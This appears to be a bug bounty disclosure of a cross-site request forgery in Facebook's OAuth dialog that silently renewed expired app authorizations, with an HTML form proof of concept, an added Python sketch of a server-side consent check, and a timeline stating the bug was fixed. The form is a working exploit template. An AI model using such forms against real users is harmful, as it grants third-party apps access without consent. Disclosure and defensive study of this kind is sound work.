[Facebook] CSRF to renew access to Apps

It was possible for an attacker to renew the victim's access to Apps whose authorization had expired, without the victim's consent.

CSRF PoC -

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.facebook.com/v2.3/dialog/oauth">
<input type="hidden" name="app&#95;id" value="XXX" />
<input type="hidden" name="auth&#95;type" value="" />
<input type="hidden" name="cbt" value="1622970398155" />
<input type="hidden" name="channel&#95;url" value="https&#58;&#47;&#47;staticxx&#46;facebook&#46;com&#47;x&#47;connect&#47;xd&#95;arbiter&#47;&#63;version&#61;46&#35;cb&#61;f11c70b8d77d13&amp;domain&#61;www&#46;jiosaavn&#46;com&amp;origin&#61;https&#37;3A&#37;2F&#37;2Fwww&#46;jiosaavn&#46;com&#37;2Ff1e7baa12b0f5a4&amp;relation&#61;opener" />
<input type="hidden" name="client&#95;id" value="XXX" />
<input type="hidden" name="display" value="popup" />
<input type="hidden" name="domain" value="www&#46;XXX&#46;com" />
<input type="hidden" name="e2e" value="&#123;&#125;" />
<input type="hidden" name="fallback&#95;redirect&#95;uri" value="https&#58;&#47;&#47;www&#46;XXX&#46;com&#47;signup&#63;redirect&#61;&#47;" />
<input type="hidden" name="fx&#95;app" value="facebook" />
<input type="hidden" name="locale" value="en&#95;US" />
<input type="hidden" name="logger&#95;id" value="f256cfb96281ce4" />
<input type="hidden" name="origin" value="1" />
<input type="hidden" name="redirect&#95;uri" value="https&#58;&#47;&#47;staticxx&#46;facebook&#46;com&#47;x&#47;connect&#47;xd&#95;arbiter&#47;&#63;version&#61;46&#35;cb&#61;f232d7fd018cdac&amp;domain&#61;www&#46;jiosaavn&#46;com&amp;origin&#61;https&#37;3A&#37;2F&#37;2Fwww&#46;XXX&#46;com&#37;2Ff1e7baa12b0f5a4&amp;relation&#61;opener&amp;frame&#61;f3505dbd2db68" />
<input type="hidden" name="response&#95;type" value="token&#44;signed&#95;request&#44;graph&#95;domain" />
<input type="hidden" name="return&#95;scopes" value="false" />
<input type="hidden" name="scope" value="public&#95;profile&#44;email" />
<input type="hidden" name="sdk" value="joey" />
<input type="hidden" name="version" value="v2&#46;3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
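The defensive side of this bug, as an added example that is not part of the original report and is not Facebook's code: a model of the server-side decision an OAuth dialog endpoint should make before completing silently. It assumes a constructed Grant record and the policy that an expired grant may only be renewed without a consent screen when the browser's Sec-Fetch-Site header shows a same-origin navigation (a real app login arrives cross-site, so cross-site requests cannot simply be rejected).

```python
from dataclasses import dataclass
from urllib.parse import parse_qs, urlparse


# Constructed model of a stored app authorization (not Facebook's data model).
@dataclass
class Grant:
    app_id: str
    scopes: frozenset
    expires_at: float  # unix seconds


def _param(q, name):
    """First value of a query parameter, or '' when absent."""
    return (q.get(name) or [""])[0]


def dialog_decision(url, headers, grant, now):
    """Return 'silent' when the dialog may complete without a consent screen,
    otherwise a string naming why explicit consent is required.

    Assumed policy: silent completion is fine for an active grant that already
    covers the requested scopes (normal OAuth). Renewing an EXPIRED grant is the
    case this report exploited and must never be silent for a request that did
    not originate from the provider's own origin.
    """
    q = parse_qs(urlparse(url).query)
    app_id = _param(q, "app_id") or _param(q, "client_id")
    requested = frozenset(s for s in _param(q, "scope").split(",") if s)
    # Sec-Fetch-Site is set by the browser and cannot be forged by page script;
    # a missing header is treated as not same-origin so the check fails closed.
    same_origin = headers.get("Sec-Fetch-Site", "").lower() == "same-origin"

    if grant is None or grant.app_id != app_id:
        return "consent: app never authorised"
    if _param(q, "auth_type") in ("rerequest", "reauthenticate"):
        return "consent: caller requested it"
    if not requested <= grant.scopes:
        return "consent: new scopes requested"
    if grant.expires_at <= now:
        # The reported bug: an expired grant was renewed silently even though
        # the dialog was reached from another site via a cross-site form.
        return "silent" if same_origin else "consent: expired grant"
    return "silent"
```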
Timeline -
Reported - Sunday, June 6, 2021
Triaged - Friday, June 18, 2021
Rewarded - Thursday, September 9, 2021 [with bonus]
Fixed - Tuesday, November 30, 2021
